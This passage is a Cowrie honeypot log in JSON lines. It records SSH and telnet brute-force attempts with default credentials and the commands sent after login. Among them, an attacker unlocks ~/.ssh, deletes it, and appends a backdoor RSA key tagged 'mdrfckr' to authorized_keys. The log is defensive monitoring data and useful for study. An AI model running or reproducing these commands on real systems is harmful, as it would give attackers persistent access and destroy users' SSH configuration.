AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:01:07.218078Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:01:07.405573Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:07.406753Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55740,"dst_ip":"1.2.3.4","dst_port":22,"session":"d12e73a35355","protocol":"ssh","message":"New connection: 212.227.235.229:55740 (1.2.3.4:22) [session: d12e73a35355]","sensor":"my-vps","timestamp":"2025-08-28T15:01:07.585295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:01:07.586106Z","src_ip":"212.227.235.229","session":"d12e73a35355"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:01:07.766163Z","src_ip":"212.227.235.229","session":"d12e73a35355"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:01:08.525611Z","src_ip":"212.227.235.229","session":"d12e73a35355"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:09.710788Z","src_ip":"212.227.235.229","session":"d12e73a35355"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56642,"dst_ip":"1.2.3.4","dst_port":22,"session":"885026314c53","protocol":"ssh","message":"New connection: 212.227.235.229:56642 (1.2.3.4:22) [session: 885026314c53]","sensor":"my-vps","timestamp":"2025-08-28T15:01:09.893260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:01:09.893933Z","src_ip":"212.227.235.229","session":"885026314c53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:01:10.077476Z","src_ip":"212.227.235.229","session":"885026314c53"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:01:10.852767Z","src_ip":"212.227.235.229","session":"885026314c53"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:11.038733Z","src_ip":"212.227.235.229","session":"74555258c1f2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:11.039656Z","src_ip":"212.227.235.229","session":"885026314c53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60572,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a59fe58276d","protocol":"telnet","message":"New connection: 212.227.235.229:60572 (1.2.3.4:23) [session: 4a59fe58276d]","sensor":"my-vps","timestamp":"2025-08-28T15:01:26.989725Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-28T15:01:27.769957Z","src_ip":"212.227.235.229","session":"4a59fe58276d"}
{"eventid":"cowrie.session.closed","duration":3.05214524269104,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:30.041803Z","src_ip":"212.227.235.229","session":"4a59fe58276d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54568,"dst_ip":"1.2.3.4","dst_port":23,"session":"f20b18f36972","protocol":"telnet","message":"New connection: 212.227.235.229:54568 (1.2.3.4:23) [session: f20b18f36972]","sensor":"my-vps","timestamp":"2025-08-28T15:01:36.280186Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T15:01:36.920744Z","src_ip":"212.227.235.229","session":"f20b18f36972"}
{"eventid":"cowrie.session.closed","duration":2.788022518157959,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:39.068134Z","src_ip":"212.227.235.229","session":"f20b18f36972"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42836,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a89d61106e0","protocol":"telnet","message":"New connection: 212.227.235.229:42836 (1.2.3.4:23) [session: 2a89d61106e0]","sensor":"my-vps","timestamp":"2025-08-28T15:01:49.669121Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:01:50.472034Z","src_ip":"212.227.235.229","session":"2a89d61106e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:01:50.489336Z","src_ip":"212.227.235.229","session":"2a89d61106e0"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T15:01:50.887751Z","src_ip":"212.227.235.229","session":"2a89d61106e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:52.177813Z","src_ip":"212.227.235.229","session":"2a89d61106e0"}
{"eventid":"cowrie.session.closed","duration":2.513468027114868,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:01:52.182517Z","src_ip":"212.227.235.229","session":"2a89d61106e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53702,"dst_ip":"1.2.3.4","dst_port":22,"session":"48b068da009e","protocol":"ssh","message":"New connection: 212.227.235.229:53702 (1.2.3.4:22) [session: 48b068da009e]","sensor":"my-vps","timestamp":"2025-08-28T15:02:10.575039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:02:10.575946Z","src_ip":"212.227.235.229","session":"48b068da009e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:02:10.763391Z","src_ip":"212.227.235.229","session":"48b068da009e"}
{"eventid":"cowrie.login.failed","username":"lee","password":"1234","message":"login attempt [lee/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:02:11.556688Z","src_ip":"212.227.235.229","session":"48b068da009e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:02:12.746750Z","src_ip":"212.227.235.229","session":"48b068da009e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52002,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2c099e9c77e","protocol":"ssh","message":"New connection: 212.227.235.229:52002 (1.2.3.4:22) [session: e2c099e9c77e]","sensor":"my-vps","timestamp":"2025-08-28T15:03:17.228756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:03:17.229703Z","src_ip":"212.227.235.229","session":"e2c099e9c77e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:03:17.417012Z","src_ip":"212.227.235.229","session":"e2c099e9c77e"}
{"eventid":"cowrie.login.failed","username":"debug","password":"debug123","message":"login attempt [debug/debug123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:03:18.200893Z","src_ip":"212.227.235.229","session":"e2c099e9c77e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:03:19.389499Z","src_ip":"212.227.235.229","session":"e2c099e9c77e"}
{"eventid":"cowrie.session.connect","src_ip":"159.203.186.148","src_port":35540,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f2141dd453f","protocol":"ssh","message":"New connection: 159.203.186.148:35540 (1.2.3.4:22) [session: 8f2141dd453f]","sensor":"my-vps","timestamp":"2025-08-28T15:04:21.341992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:04:21.350686Z","src_ip":"159.203.186.148","session":"8f2141dd453f"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T15:04:21.433464Z","src_ip":"159.203.186.148","session":"8f2141dd453f"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:04:21.708880Z","src_ip":"159.203.186.148","session":"8f2141dd453f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50374,"dst_ip":"1.2.3.4","dst_port":22,"session":"be565dabf621","protocol":"ssh","message":"New connection: 212.227.235.229:50374 (1.2.3.4:22) [session: be565dabf621]","sensor":"my-vps","timestamp":"2025-08-28T15:04:24.026783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:04:24.027785Z","src_ip":"212.227.235.229","session":"be565dabf621"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:04:24.216242Z","src_ip":"212.227.235.229","session":"be565dabf621"}
{"eventid":"cowrie.login.failed","username":"abhishek","password":"abhishek","message":"login attempt [abhishek/abhishek] failed","sensor":"my-vps","timestamp":"2025-08-28T15:04:25.012729Z","src_ip":"212.227.235.229","session":"be565dabf621"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:04:26.204461Z","src_ip":"212.227.235.229","session":"be565dabf621"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43862,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a65f554d89e","protocol":"telnet","message":"New connection: 212.227.125.160:43862 (1.2.3.4:23) [session: 1a65f554d89e]","sensor":"my-vps","timestamp":"2025-08-28T15:04:57.102205Z"}
{"eventid":"cowrie.session.closed","duration":31.624701499938965,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:05:28.726837Z","src_ip":"212.227.125.160","session":"1a65f554d89e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48722,"dst_ip":"1.2.3.4","dst_port":22,"session":"95426296eb1f","protocol":"ssh","message":"New connection: 212.227.235.229:48722 (1.2.3.4:22) [session: 95426296eb1f]","sensor":"my-vps","timestamp":"2025-08-28T15:05:33.510916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:05:33.511858Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:05:33.689129Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin12345","message":"login attempt [root/Admin12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:05:34.439801Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:05:34.812937Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:05:34.813581Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:05:34.814736Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:05:34.993949Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:05:35.785635Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 